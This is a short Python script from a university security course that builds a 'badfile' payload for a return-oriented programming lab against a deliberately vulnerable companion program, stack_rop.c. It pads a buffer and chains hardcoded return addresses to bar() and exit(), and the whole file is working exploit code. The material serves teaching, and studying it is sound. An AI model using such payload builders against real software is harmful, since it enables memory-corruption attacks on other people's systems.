#!/usr/bin/python3
import sys

''' Prepare a badfile for exploiting return-oriented programming. use
	in conjunction with stack_rop.c.  First run this program to create
	badfile, then run stack_rop to demonstrate multiple calls to bar.

	Author: Tim Pierson, Dartmouth CS55, Winter 2021
		From Du: Computer and Internet Security at https://raw.githubusercontent.com/kevin-w-du/BookCode/master/Return_to_Libc/chain_noarg.py 

	run: python3 exploit_rop.py
	will output badfile to be exploited by stack_rop.c
'''

def tobytes (value):
   return (value).to_bytes(4,byteorder='little')


bar_addr   = 0x080485fb  # Address of bar()
exit_addr  = 0xb7d939d0  # Address of exit()

content = bytearray(0xaa for i in range(112))
content += tobytes(0xFFFFFFFF)  # This value is not important here.
for i in range(10):           
   content += tobytes(bar_addr)

# Invoke exit() to exit gracefully at the end
content += tobytes(exit_addr)

# Write the content to a file
with open("badfile", "wb") as f:
  f.write(content)